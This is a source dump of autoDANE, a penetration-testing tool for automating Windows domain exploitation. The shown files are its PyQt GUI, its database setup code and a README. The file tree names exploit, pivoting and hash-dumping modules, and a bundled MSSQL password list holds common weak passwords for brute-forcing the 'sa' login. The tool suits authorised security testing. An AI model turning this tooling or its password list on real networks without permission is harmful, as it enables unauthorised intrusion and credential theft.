├── Readme.md
├── __init__.py
├── asyncproc.py
├── autodane.e4p
├── autodane.py
├── createdb.sql
├── createdbstructure.sql
├── creds
├── mssql_passes
└── mssql_users
├── images
├── confirm.png
├── db-connection.jpg
├── email.png
├── logo.png
├── refresh.ico
└── skype.png
├── initialoptions
├── Ui_choosefootprint.py
├── __init__.py
├── choosefootprint.py
└── choosefootprint.ui
├── inputwindows
├── Ui_adddomaincreds.py
├── Ui_addhost.py
├── Ui_addport.py
├── Ui_confirmation.py
├── Ui_newtask.py
├── Ui_newtrigger.py
├── Ui_textinput.py
├── __init__.py
├── adddomaincreds.py
├── adddomaincreds.ui
├── addhost.py
├── addhost.ui
├── addport.py
├── addport.ui
├── confirmation.py
├── confirmation.ui
├── newtask.py
├── newtask.ui
├── newtrigger.py
├── newtrigger.py2
├── newtrigger.ui
├── textinput.py
└── textinput.ui
├── install
├── main
├── Ui_mainwindow.py
├── __init__.py
├── mainwindow.py
└── mainwindow.ui
├── msf
├── .exploit.py.swn
├── .exploit.py.swo
├── .exploit.py.swp
├── __init__.py
└── exploit.py
├── plugins
├── __init__.py
├── domain_enumeration
│ ├── .buenumerate_users_and_groups.py.swp
│ ├── .enumerate_groups.py.swo
│ ├── .enumerate_groups.py.swp
│ ├── .enumerate_users.py.swo
│ ├── .enumerate_users.py.swp
│ ├── __init__.py
│ ├── bruteforce_ntlm_hashes.py
│ ├── enumerate_groups.py
│ ├── enumerate_users.py
│ └── extract_domain_hashes.py
├── footprinting
│ ├── __init__.py
│ ├── host_dns_lookup.py
│ ├── net_range_dns_lookup.py
│ ├── portscan_host.py
│ ├── portscan_net_range.py
│ ├── portscan_scoped_host.py
│ ├── portscan_scoped_range.py
│ ├── query_mssql_discovery_service.py
│ ├── scoped_range_dns_lookup.py
│ └── screenshot_website.py
├── host_enumeration
│ ├── __init__.py
│ ├── add_local_ip.py
│ ├── add_local_nameservers.py
│ └── zone_transfer_assigned_domain.py
├── pivoting
│ ├── __init__.py
│ ├── psexec_domain_account.py
│ ├── psexec_local_account.py
│ ├── retry_domain_accounts.py
│ ├── retry_local_accounts.py
│ └── verify_domain_credentials.py
├── vuln_exploits
│ ├── __init__.py
│ ├── exploit_ms08_067.py
│ ├── exploit_weak_sql_creds.py
│ └── exploit_weak_tomcat_creds.py
└── vuln_scanning
│ ├── __init__.py
│ ├── ms08_067.py
│ ├── weak_sql_creds.py
│ └── weak_tomcat_creds.py
├── settings.ini
├── software
├── .adsmbexec.py.swp
├── adsecretsdump.py
├── adsmbexec.py
├── metasploit
│ └── modules
│ │ └── post
│ │ └── windows
│ │ ├── gather
│ │ └── sp_smart_hashdump.rb
│ │ └── manage
│ │ └── sp_smart_migrate.rb
├── mimikatz_trunk
│ ├── README.md
│ ├── Win32
│ │ ├── mimidrv.sys
│ │ ├── mimikatz.exe
│ │ └── mimilib.dll
│ └── x64
│ │ ├── mimidrv.sys
│ │ ├── mimikatz.exe
│ │ └── mimilib.dll
├── ms08-067_check
│ ├── COPYING
│ ├── ms08-067.nse
│ ├── ms08-067_check.py
│ ├── ndr.py
│ └── ndr.pyc
├── test.txt
├── tomcat_check
│ └── tomcat-scan.nse
└── wce
│ ├── test.txt
│ └── wce.exe
├── splash
├── Ui_dbconnecting.py
├── __init__.py
├── dbconnecting.py
└── dbconnecting.ui
├── truncate
├── truncate.sql
└── worker
├── .workerthread.py.swo
├── .workerthread.py.swp
├── __init__.py
└── workerthread.py
/Readme.md:
--------------------------------------------------------------------------------
1 | Auto Domain Admin and Network Exploitation (autoDANE)
2 | by dane at sensepost dot com
3 |
4 | First released at ZaCon 2015 3 Oct 2015
5 |
6 | About
7 | -----
8 |
9 | Auto DANE attempts to automate the process of exploiting, pivoting and escalating privileges on Windows domains.
10 |
11 | Installing
12 | ----------
13 |
14 | Run install.sh. This will install all the prerequisites.
15 |
16 | Running
17 | -------
18 |
19 | After that, simply run ./autodane.py
20 |
21 | License
22 | -------
23 |
24 | autodane is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License (http://creativecommons.org/licenses/by-nc-sa/4.0/) Permissions beyond the scope of this license may be available at http://sensepost.com/contact_us/.
25 |
--------------------------------------------------------------------------------
/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sensepost/autoDANE/50153da2521c78bb11e8bcf95930614abaf55e5f/__init__.py
--------------------------------------------------------------------------------
/autodane.e4p:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 | en_US
8 | 1135dcb6d9ca37f4dc87815c847bdbb12e5b4250
9 | Python2
10 | Qt4
11 |
12 | 0.1
13 |
14 |
15 |
16 |
17 | splash/Ui_dbconnecting.py
18 | initialoptions/Ui_choosefootprint.py
19 | autodane.py
20 | main/Ui_mainwindow.py
21 | splash/dbconnecting.py
22 | worker/workerthread.py
23 | plugins/host_enumeration/add_local_ip.py
24 | plugins/footprinting/portscan_host.py
25 | plugins/footprinting/portscan_net_range.py
26 | settings.ini
27 | inputwindows/Ui_newtrigger.py
28 | inputwindows/Ui_newtask.py
29 | inputwindows/newtask.py
30 | inputwindows/newtrigger.py
31 | plugins/footprinting/host_dns_lookup.py
32 | plugins/host_enumeration/add_local_nameservers.py
33 | plugins/footprinting/screenshot_website.py
34 | plugins/vuln_scanning/ms08_067.py
35 | plugins/vuln_exploits/exploit_ms08_067.py
36 | msf/exploit.py
37 | plugins/pivoting/retry_local_accounts.py
38 | plugins/pivoting/psexec_local_account.py
39 | plugins/footprinting/portscan_scoped_host.py
40 | plugins/vuln_scanning/weak_sql_creds.py
41 | plugins/vuln_exploits/exploit_weak_sql_creds.py
42 | plugins/vuln_exploits/exploit_weak_tomcat_creds.py
43 | plugins/pivoting/retry_domain_accounts.py
44 | plugins/pivoting/psexec_domain_account.py
45 | plugins/footprinting/portscan_scoped_range.py
46 | plugins/pivoting/verify_domain_credentials.py
47 | plugins/vuln_scanning/weak_tomcat_creds.py
48 | plugins/domain_enumeration/extract_domain_hashes.py
49 | initialoptions/choosefootprint.py
50 | main/mainwindow.py
51 | plugins/domain_enumeration/bruteforce_ntlm_hashes.py
52 | inputwindows/Ui_confirmation.py
53 | inputwindows/confirmation.py
54 | plugins/footprinting/net_range_dns_lookup.py
55 | plugins/footprinting/scoped_range_dns_lookup.py
56 | plugins/host_enumeration/zone_transfer_assigned_domain.py
57 | inputwindows/Ui_adddomaincreds.py
58 | inputwindows/adddomaincreds.py
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 | splash/Ui_dbconnecting.py
74 |
75 | autodane.py
76 |
77 | None
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
87 |
88 |
89 |
90 |
91 |
92 |
--------------------------------------------------------------------------------
/autodane.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 |
3 | from PyQt4 import *
4 | from PyQt4.QtCore import *
5 | from PyQt4.QtGui import QApplication
6 |
7 | from splash.dbconnecting import DBConnecting
8 | from initialoptions.choosefootprint import ChooseFootprint
9 | from main.mainwindow import MainWindow
10 |
11 | import sys
12 | import os
13 | import psycopg2
14 | import ConfigParser
15 | import thread
16 | import datetime
17 |
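def main():
    """Start the autoDANE GUI and hand the chosen footprint to the worker thread.

    Steps, in order: read the ``[postgres]`` section of ``settings.ini``, probe
    the database (showing the DBConnecting dialog when the probe fails), let
    the operator pick or name a footprint, store the scope items, known hosts,
    known DCs, ranges and domain credentials entered in the dialog, refresh the
    main window and start ``MainWindow.startWork`` on a new thread.

    The process exits through ``sys.exit`` in every path: with the Qt event
    loop's return code on the normal path, or immediately when either dialog
    is dismissed.
    """
    app = QApplication(sys.argv)

    wndDBConnecting = DBConnecting()
    wndChooseFootprint = ChooseFootprint()
    wndMainWindow = MainWindow()

    # settings.ini carries the Postgres password in clear text; the file should
    # be readable only by the account that runs the tool.
    conf = ConfigParser.ConfigParser()
    conf.read("settings.ini")

    def connect():
        """Open a Postgres connection from the [postgres] settings."""
        return psycopg2.connect(
            host=conf.get('postgres', 'host'),
            user=conf.get('postgres', 'user'),
            password=conf.get('postgres', 'pass'),
            dbname=conf.get('postgres', 'db'))

    runApp = True
    try:
        # Probe only. The connection is closed straight away; the original
        # dropped it without closing, leaving an idle session on the server.
        connect().close()
    except Exception:
        # Any connection or configuration error sends the operator to the
        # DB-connection dialog. Exception (not a bare except) lets
        # KeyboardInterrupt and SystemExit propagate.
        runApp = wndDBConnecting.exec_()

    if not runApp:
        sys.exit()

    db = connect()
    db.autocommit = True

    def run(sql, params=None, fetch=False):
        """Execute one statement on a short-lived cursor; return rows if *fetch*."""
        cursor = db.cursor()
        try:
            cursor.execute(sql, params)
            return cursor.fetchall() if fetch else None
        finally:
            cursor.close()

    footprints_list = [""]
    for row in run("select footprint_name from footprints order by footprint_name",
                   fetch=True):
        footprints_list.append(row[0])

    wndChooseFootprint.setFootprints(footprints_list)
    wndChooseFootprint.db = db
    wndChooseFootprint.updateUI()

    if not wndChooseFootprint.exec_():
        sys.exit()

    # Tasks left flagged in_progress are reset before new work is queued.
    run("update task_list set in_progress = false where in_progress = true")

    footprint_id = run("select createFootprint(%s);",
                       (str(wndChooseFootprint.txtFootprintName.text()), ),
                       fetch=True)[0][0]

    wndMainWindow.setWindowTitle("autodane : {0}".format(
        wndChooseFootprint.txtFootprintName.text()))

    wndMainWindow.db = db
    wndMainWindow.footprint_id = footprint_id

    # Scope item type 3: exclusions.
    for item in wndChooseFootprint.txtExclude.toPlainText().split("\n"):
        if item != "":
            run("select addScopeItem(%s, %s, %s)",
                (footprint_id, 3, str(item), ))

    excluded = run(
        "select item_value from scope where footprint_id = %s and item_type = 3",
        (footprint_id, ), fetch=True)

    # The exclusion list is written with plain file I/O. The original built
    # `echo <value> >> temp/exclude_list` command lines with os.popen, so any
    # shell metacharacter in a stored scope value was interpreted by the shell,
    # and the un-awaited popen calls could also complete out of order.
    # The file layout is unchanged: one empty line, then one value per line.
    if not os.path.isdir("temp"):
        os.makedirs("temp")
    with open("temp/exclude_list", "w") as exclude_file:
        exclude_file.write("\n")
        for row in excluded:
            exclude_file.write("{0}\n".format(row[0]))

    # TODO: call these in a thread, so they can take as long as they
    # need to
    # Scope item type 1: known hosts.
    for item in wndChooseFootprint.txtKnownHosts.toPlainText().split("\n"):
        if item != "":
            run("select addScopeItem(%s, %s, %s)",
                (footprint_id, 1, str(item), ))

    for item in wndChooseFootprint.txtKnownDCs.toPlainText().split("\n"):
        if item != "":
            run("select addHost(%s, %s::varchar, ''::varchar, true)",
                (footprint_id, str(item), ))

    # Scope item type 2: ranges. A x.y.0.0/16 entry is expanded into its 256
    # /24 ranges; everything else is stored as typed.
    for item in wndChooseFootprint.txtKnownRanges.toPlainText().split("\n"):
        if item == "":
            continue
        octs = item.split(".")
        # Entries with fewer than four dot-separated parts used to raise
        # IndexError on octs[3]; they are now stored as typed.
        last_part = octs[3] if len(octs) > 3 else ""
        if last_part == "0/16":
            for oct2 in range(0, 256):
                run("select addScopeItem(%s, %s, %s)",
                    (footprint_id, 2,
                     "{0}.{1}.{2}.0/24".format(octs[0], octs[1], oct2), ))
        else:
            run("select addScopeItem(%s, %s, %s)",
                (footprint_id, 2, str(item), ))

    # NOTE(review): passwords and LM/NTLM hashes typed into the dialog are
    # handed to addDomainCreds as entered; how the database stores them is not
    # visible here, so access to the database should be restricted accordingly.
    for row in xrange(0, wndChooseFootprint.tblDomainCreds.rowCount()):
        domain = wndChooseFootprint.tblDomainCreds.item(row, 0).text()
        username = wndChooseFootprint.tblDomainCreds.item(row, 1).text()
        password = wndChooseFootprint.tblDomainCreds.item(row, 2).text()
        lm_hash = wndChooseFootprint.tblDomainCreds.item(row, 3).text()
        ntlm_hash = wndChooseFootprint.tblDomainCreds.item(row, 4).text()
        valid = (wndChooseFootprint.tblDomainCreds.item(row, 5).text() == "True")

        run("select addDomainCreds(%s, %s, %s, %s, %s, %s, %s)",
            (footprint_id, 0, str(domain), str(username), str(password),
             str(lm_hash), str(ntlm_hash), ))

        if valid is True:
            run("update domain_credentials set verified = true, valid = true where footprint_id = %s and domain = %s and username = %s",
                (footprint_id, str(domain), str(username), ))

    # Populate every tab once before the window is shown.
    wndMainWindow.on_btnUpdateSummary_clicked()
    wndMainWindow.on_btnUpdateHosts_clicked()
    wndMainWindow.on_btnRefreshVulnerabilitiesTab_clicked()
    wndMainWindow.on_btnUpdateDomains_clicked()
    wndMainWindow.on_btnUpdateCreds_clicked()
    wndMainWindow.on_btnUpdateTaskList_clicked()
    wndMainWindow.setupFilterCombos()
    wndMainWindow.updateWebsites()

    wndMainWindow.show()

    if wndChooseFootprint.sldTestDepth.value() > 0:
        for i in wndChooseFootprint.enumerationPlugins:
            if wndChooseFootprint.enumerationPlugins[i][3] is True:
                # TODO add logic to check whether these tasks have been done before adding them
                # otherwise the same thing will be run each time the
                # app is opened
                run("insert into task_list (footprint_id, task_descriptions_id, item_identifier) values (%s, %s, 0)",
                    (footprint_id, wndChooseFootprint.enumerationPlugins[i][0], ))

    nmap_timing = wndChooseFootprint.cmbNmapTiming.currentText()
    network_interface = wndChooseFootprint.cmbNetworkInterface.currentText()
    thread_counts = {
        'all': wndChooseFootprint.sedAllTasks.value(),
        'footprinting': wndChooseFootprint.sedFootprinting.value(),
        'exploits': wndChooseFootprint.sedExploits.value(),
        'pivoting': wndChooseFootprint.sedPivoting.value(),
        'pivoting_msf': wndChooseFootprint.sedPivotingMsf.value(),
        'domain_enumeration': wndChooseFootprint.sedDomainEnumeration.value(),
    }

    # NOTE(review): the listing this was reviewed from had lost its
    # indentation, so it is not certain whether the worker start was nested
    # under the test-depth check above. It is kept unconditional because the
    # depth value itself is passed to startWork - confirm against the file.
    thread.start_new_thread(
        wndMainWindow.startWork,
        (wndChooseFootprint.sldTestDepth.value(), nmap_timing,
         network_interface, thread_counts))

    sys.exit(app.exec_())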
229 |
230 | if __name__ == '__main__':
231 | main()
232 |
--------------------------------------------------------------------------------
/createdb.sql:
--------------------------------------------------------------------------------
1 | create database autodane;
2 |
--------------------------------------------------------------------------------
/creds/mssql_passes:
--------------------------------------------------------------------------------
1 |
2 | admin
3 | master
4 | password
5 | password123
6 | Password1
7 | Pa$$w0rd
8 | P@ssw0rd
9 | P@..w0rd
10 | s3rvic3s
11 | s3rvices.123
12 | sa
13 | test
14 | zaq12wsx
15 | 1qaz2wsx
16 |
--------------------------------------------------------------------------------
/creds/mssql_users:
--------------------------------------------------------------------------------
1 | sa
2 |
--------------------------------------------------------------------------------
/images/confirm.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sensepost/autoDANE/50153da2521c78bb11e8bcf95930614abaf55e5f/images/confirm.png
--------------------------------------------------------------------------------
/images/db-connection.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sensepost/autoDANE/50153da2521c78bb11e8bcf95930614abaf55e5f/images/db-connection.jpg
--------------------------------------------------------------------------------
/images/email.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sensepost/autoDANE/50153da2521c78bb11e8bcf95930614abaf55e5f/images/email.png
--------------------------------------------------------------------------------
/images/logo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sensepost/autoDANE/50153da2521c78bb11e8bcf95930614abaf55e5f/images/logo.png
--------------------------------------------------------------------------------
/images/refresh.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sensepost/autoDANE/50153da2521c78bb11e8bcf95930614abaf55e5f/images/refresh.ico
--------------------------------------------------------------------------------
/images/skype.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sensepost/autoDANE/50153da2521c78bb11e8bcf95930614abaf55e5f/images/skype.png
--------------------------------------------------------------------------------
/initialoptions/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sensepost/autoDANE/50153da2521c78bb11e8bcf95930614abaf55e5f/initialoptions/__init__.py
--------------------------------------------------------------------------------
/inputwindows/Ui_adddomaincreds.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
3 | # Form implementation generated from reading ui file '/home/dane/projects/autodane/autodane_pg/inputwindows/adddomaincreds.ui'
4 | #
5 | # Created by: PyQt4 UI code generator 4.11.4
6 | #
7 | # WARNING! All changes made in this file will be lost!
8 |
9 | from PyQt4 import QtCore, QtGui
10 |
# Compatibility shim: use QString.fromUtf8 when QtCore exposes QString,
# otherwise fall back to returning the string unchanged.
try:
    _fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
    def _fromUtf8(s):
        """Return *s* unchanged (fallback when QtCore has no QString)."""
        return s

# Compatibility shim: pass the UnicodeUTF8 encoding to translate() when
# QApplication defines it, otherwise call translate() without an encoding.
try:
    _encoding = QtGui.QApplication.UnicodeUTF8
    def _translate(context, text, disambig):
        """Translate *text* in *context*, passing the UnicodeUTF8 encoding."""
        return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
    def _translate(context, text, disambig):
        """Translate *text* in *context* without an explicit encoding."""
        return QtGui.QApplication.translate(context, text, disambig)
24 |
class Ui_Dialog(object):
    """Generated form for the "Add Domain Creds" dialog.

    Holds five labelled line edits (domain, username, password, LM hash,
    NTLM hash), a "verified" checkbox and OK/Cancel buttons. The file header
    states it is produced by the PyQt4 UI code generator from
    adddomaincreds.ui, so lasting changes belong in that .ui file.
    """
    def setupUi(self, Dialog):
        """Create the widgets and layouts on *Dialog* and set their texts."""
        Dialog.setObjectName(_fromUtf8("Dialog"))
        Dialog.resize(668, 398)
        Dialog.setSizeGripEnabled(True)
        self.gridLayout = QtGui.QGridLayout(Dialog)
        self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
        self.verticalLayout = QtGui.QVBoxLayout()
        self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
        # Row 1: domain.
        self.horizontalLayout = QtGui.QHBoxLayout()
        self.horizontalLayout.setObjectName(_fromUtf8("horizontalLayout"))
        self.label = QtGui.QLabel(Dialog)
        self.label.setMinimumSize(QtCore.QSize(100, 0))
        self.label.setObjectName(_fromUtf8("label"))
        self.horizontalLayout.addWidget(self.label)
        self.txtDomain = QtGui.QLineEdit(Dialog)
        self.txtDomain.setObjectName(_fromUtf8("txtDomain"))
        self.horizontalLayout.addWidget(self.txtDomain)
        self.verticalLayout.addLayout(self.horizontalLayout)
        # Row 2: username.
        self.horizontalLayout_2 = QtGui.QHBoxLayout()
        self.horizontalLayout_2.setObjectName(_fromUtf8("horizontalLayout_2"))
        self.label_2 = QtGui.QLabel(Dialog)
        self.label_2.setMinimumSize(QtCore.QSize(100, 0))
        self.label_2.setObjectName(_fromUtf8("label_2"))
        self.horizontalLayout_2.addWidget(self.label_2)
        self.txtUsername = QtGui.QLineEdit(Dialog)
        self.txtUsername.setObjectName(_fromUtf8("txtUsername"))
        self.horizontalLayout_2.addWidget(self.txtUsername)
        self.verticalLayout.addLayout(self.horizontalLayout_2)
        # Row 3: password.
        # NOTE(review): txtPassword is a plain QLineEdit and no setEchoMode()
        # call appears in this method, so the typed password is displayed in
        # clear text on screen. If masking is wanted, set it in the .ui file.
        self.horizontalLayout_3 = QtGui.QHBoxLayout()
        self.horizontalLayout_3.setObjectName(_fromUtf8("horizontalLayout_3"))
        self.label_3 = QtGui.QLabel(Dialog)
        self.label_3.setMinimumSize(QtCore.QSize(100, 0))
        self.label_3.setObjectName(_fromUtf8("label_3"))
        self.horizontalLayout_3.addWidget(self.label_3)
        self.txtPassword = QtGui.QLineEdit(Dialog)
        self.txtPassword.setObjectName(_fromUtf8("txtPassword"))
        self.horizontalLayout_3.addWidget(self.txtPassword)
        self.verticalLayout.addLayout(self.horizontalLayout_3)
        # Row 4: LM hash.
        self.horizontalLayout_4 = QtGui.QHBoxLayout()
        self.horizontalLayout_4.setObjectName(_fromUtf8("horizontalLayout_4"))
        self.label_4 = QtGui.QLabel(Dialog)
        self.label_4.setMinimumSize(QtCore.QSize(100, 0))
        self.label_4.setObjectName(_fromUtf8("label_4"))
        self.horizontalLayout_4.addWidget(self.label_4)
        self.txtLMHash = QtGui.QLineEdit(Dialog)
        self.txtLMHash.setObjectName(_fromUtf8("txtLMHash"))
        self.horizontalLayout_4.addWidget(self.txtLMHash)
        self.verticalLayout.addLayout(self.horizontalLayout_4)
        # Row 5: NTLM hash.
        self.horizontalLayout_5 = QtGui.QHBoxLayout()
        self.horizontalLayout_5.setObjectName(_fromUtf8("horizontalLayout_5"))
        self.label_5 = QtGui.QLabel(Dialog)
        self.label_5.setMinimumSize(QtCore.QSize(100, 0))
        self.label_5.setObjectName(_fromUtf8("label_5"))
        self.horizontalLayout_5.addWidget(self.label_5)
        self.txtNTLMHash = QtGui.QLineEdit(Dialog)
        self.txtNTLMHash.setObjectName(_fromUtf8("txtNTLMHash"))
        self.horizontalLayout_5.addWidget(self.txtNTLMHash)
        self.verticalLayout.addLayout(self.horizontalLayout_5)
        # The object name says "CheckAgainstDC", but the label assigned in
        # retranslateUi reads "Verified. ..."; it starts unchecked.
        self.cbxCheckAgainstDC = QtGui.QCheckBox(Dialog)
        self.cbxCheckAgainstDC.setChecked(False)
        self.cbxCheckAgainstDC.setObjectName(_fromUtf8("cbxCheckAgainstDC"))
        self.verticalLayout.addWidget(self.cbxCheckAgainstDC)
        spacerItem = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
        self.verticalLayout.addItem(spacerItem)
        # Button row: an expanding spacer is added before OK and Cancel.
        self.horizontalLayout_6 = QtGui.QHBoxLayout()
        self.horizontalLayout_6.setObjectName(_fromUtf8("horizontalLayout_6"))
        spacerItem1 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
        self.horizontalLayout_6.addItem(spacerItem1)
        self.btnOK = QtGui.QPushButton(Dialog)
        self.btnOK.setObjectName(_fromUtf8("btnOK"))
        self.horizontalLayout_6.addWidget(self.btnOK)
        self.btnCancel = QtGui.QPushButton(Dialog)
        self.btnCancel.setObjectName(_fromUtf8("btnCancel"))
        self.horizontalLayout_6.addWidget(self.btnCancel)
        self.verticalLayout.addLayout(self.horizontalLayout_6)
        self.gridLayout.addLayout(self.verticalLayout, 0, 0, 1, 1)

        self.retranslateUi(Dialog)
        QtCore.QMetaObject.connectSlotsByName(Dialog)

    def retranslateUi(self, Dialog):
        """Assign the window title and the text of every label and button."""
        Dialog.setWindowTitle(_translate("Dialog", "Add Domain Creds", None))
        self.label.setText(_translate("Dialog", "Domain", None))
        self.label_2.setText(_translate("Dialog", "Username", None))
        self.label_3.setText(_translate("Dialog", "Password", None))
        self.label_4.setText(_translate("Dialog", "LM Hash", None))
        self.label_5.setText(_translate("Dialog", "NTLM Hash", None))
        self.cbxCheckAgainstDC.setText(_translate("Dialog", "Verified. Check this if you\'re sure the password is correct", None))
        self.btnOK.setText(_translate("Dialog", "OK", None))
        self.btnCancel.setText(_translate("Dialog", "Cancel", None))
116 |
117 |
# Manual preview: when this module is run directly, show the bare dialog
# built by Ui_Dialog and exit with the event loop's return code.
if __name__ == "__main__":
    import sys
    app = QtGui.QApplication(sys.argv)
    Dialog = QtGui.QDialog()
    ui = Ui_Dialog()
    ui.setupUi(Dialog)
    Dialog.show()
    sys.exit(app.exec_())
126 |
127 |
--------------------------------------------------------------------------------
/inputwindows/Ui_addhost.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
3 | # Form implementation generated from reading ui file '/root/Projects/autoDANE/inputwindows/addhost.ui'
4 | #
5 | # Created: Wed Feb 17 14:40:17 2016
6 | # by: PyQt4 UI code generator 4.11.2
7 | #
8 | # WARNING! All changes made in this file will be lost!
9 |
10 | from PyQt4 import QtCore, QtGui
11 |
# Compatibility shim: use QString.fromUtf8 when QtCore exposes QString,
# otherwise fall back to returning the string unchanged.
try:
    _fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
    def _fromUtf8(s):
        """Return *s* unchanged (fallback when QtCore has no QString)."""
        return s

# Compatibility shim: pass the UnicodeUTF8 encoding to translate() when
# QApplication defines it, otherwise call translate() without an encoding.
try:
    _encoding = QtGui.QApplication.UnicodeUTF8
    def _translate(context, text, disambig):
        """Translate *text* in *context*, passing the UnicodeUTF8 encoding."""
        return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
    def _translate(context, text, disambig):
        """Translate *text* in *context* without an explicit encoding."""
        return QtGui.QApplication.translate(context, text, disambig)
25 |
class Ui_Dialog(object):
    """Generated form for the "Add Host" dialog.

    Holds one labelled line edit for an IP address plus OK/Cancel buttons.
    The file header states it is produced by the PyQt4 UI code generator from
    addhost.ui, so lasting changes belong in that .ui file.
    """
    def setupUi(self, Dialog):
        """Create the widgets and layouts on *Dialog* and set their texts."""
        Dialog.setObjectName(_fromUtf8("Dialog"))
        Dialog.resize(465, 151)
        Dialog.setSizeGripEnabled(True)
        self.gridLayout = QtGui.QGridLayout(Dialog)
        self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
        self.verticalLayout = QtGui.QVBoxLayout()
        self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
        self.horizontalLayout = QtGui.QHBoxLayout()
        self.horizontalLayout.setObjectName(_fromUtf8("horizontalLayout"))
        self.label = QtGui.QLabel(Dialog)
        self.label.setObjectName(_fromUtf8("label"))
        self.horizontalLayout.addWidget(self.label)
        # Free-text field: no validator or input mask is attached in this
        # method, so whatever consumes the value has to validate it.
        self.txtIPAddress = QtGui.QLineEdit(Dialog)
        self.txtIPAddress.setObjectName(_fromUtf8("txtIPAddress"))
        self.horizontalLayout.addWidget(self.txtIPAddress)
        self.verticalLayout.addLayout(self.horizontalLayout)
        spacerItem = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
        self.verticalLayout.addItem(spacerItem)
        # Button row: an expanding spacer is added before OK and Cancel.
        self.horizontalLayout_2 = QtGui.QHBoxLayout()
        self.horizontalLayout_2.setObjectName(_fromUtf8("horizontalLayout_2"))
        spacerItem1 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
        self.horizontalLayout_2.addItem(spacerItem1)
        self.btnOK = QtGui.QPushButton(Dialog)
        self.btnOK.setObjectName(_fromUtf8("btnOK"))
        self.horizontalLayout_2.addWidget(self.btnOK)
        self.btnCancel = QtGui.QPushButton(Dialog)
        self.btnCancel.setObjectName(_fromUtf8("btnCancel"))
        self.horizontalLayout_2.addWidget(self.btnCancel)
        self.verticalLayout.addLayout(self.horizontalLayout_2)
        self.gridLayout.addLayout(self.verticalLayout, 0, 0, 1, 1)

        self.retranslateUi(Dialog)
        QtCore.QMetaObject.connectSlotsByName(Dialog)

    def retranslateUi(self, Dialog):
        """Assign the window title and the text of the label and buttons."""
        Dialog.setWindowTitle(_translate("Dialog", "Add Host", None))
        self.label.setText(_translate("Dialog", "IP Address", None))
        self.btnOK.setText(_translate("Dialog", "OK", None))
        self.btnCancel.setText(_translate("Dialog", "Cancel", None))
67 |
68 |
# Manual preview: when this module is run directly, show the bare dialog
# built by Ui_Dialog and exit with the event loop's return code.
if __name__ == "__main__":
    import sys
    app = QtGui.QApplication(sys.argv)
    Dialog = QtGui.QDialog()
    ui = Ui_Dialog()
    ui.setupUi(Dialog)
    Dialog.show()
    sys.exit(app.exec_())
77 |
78 |
--------------------------------------------------------------------------------
/inputwindows/Ui_addport.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
3 | # Form implementation generated from reading ui file '/home/dane/projects/autodane/autodane_pg/inputwindows/addport.ui'
4 | #
5 | # Created by: PyQt4 UI code generator 4.11.4
6 | #
7 | # WARNING! All changes made in this file will be lost!
8 |
9 | from PyQt4 import QtCore, QtGui
10 |
# Compatibility shim: use QString.fromUtf8 when QtCore exposes QString,
# otherwise fall back to returning the string unchanged.
try:
    _fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
    def _fromUtf8(s):
        """Return *s* unchanged (fallback when QtCore has no QString)."""
        return s

# Compatibility shim: pass the UnicodeUTF8 encoding to translate() when
# QApplication defines it, otherwise call translate() without an encoding.
try:
    _encoding = QtGui.QApplication.UnicodeUTF8
    def _translate(context, text, disambig):
        """Translate *text* in *context*, passing the UnicodeUTF8 encoding."""
        return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
    def _translate(context, text, disambig):
        """Translate *text* in *context* without an explicit encoding."""
        return QtGui.QApplication.translate(context, text, disambig)
24 |
class Ui_Dialog(object):
    """Generated form for the "New Port" dialog.

    Holds one labelled spin box for a port number plus OK/Cancel buttons.
    The file header states it is produced by the PyQt4 UI code generator from
    addport.ui, so lasting changes belong in that .ui file.
    """
    def setupUi(self, Dialog):
        """Create the widgets and layouts on *Dialog* and set their texts."""
        Dialog.setObjectName(_fromUtf8("Dialog"))
        Dialog.resize(478, 164)
        Dialog.setSizeGripEnabled(True)
        self.verticalLayout = QtGui.QVBoxLayout(Dialog)
        self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
        self.horizontalLayout = QtGui.QHBoxLayout()
        self.horizontalLayout.setObjectName(_fromUtf8("horizontalLayout"))
        self.label = QtGui.QLabel(Dialog)
        self.label.setMaximumSize(QtCore.QSize(100, 16777215))
        self.label.setObjectName(_fromUtf8("label"))
        self.horizontalLayout.addWidget(self.label)
        # Only the upper bound (65535) is set here; no setMinimum() call
        # appears, so the spin box keeps its default lower bound.
        self.sbPort = QtGui.QSpinBox(Dialog)
        self.sbPort.setMaximum(65535)
        self.sbPort.setObjectName(_fromUtf8("sbPort"))
        self.horizontalLayout.addWidget(self.sbPort)
        self.verticalLayout.addLayout(self.horizontalLayout)
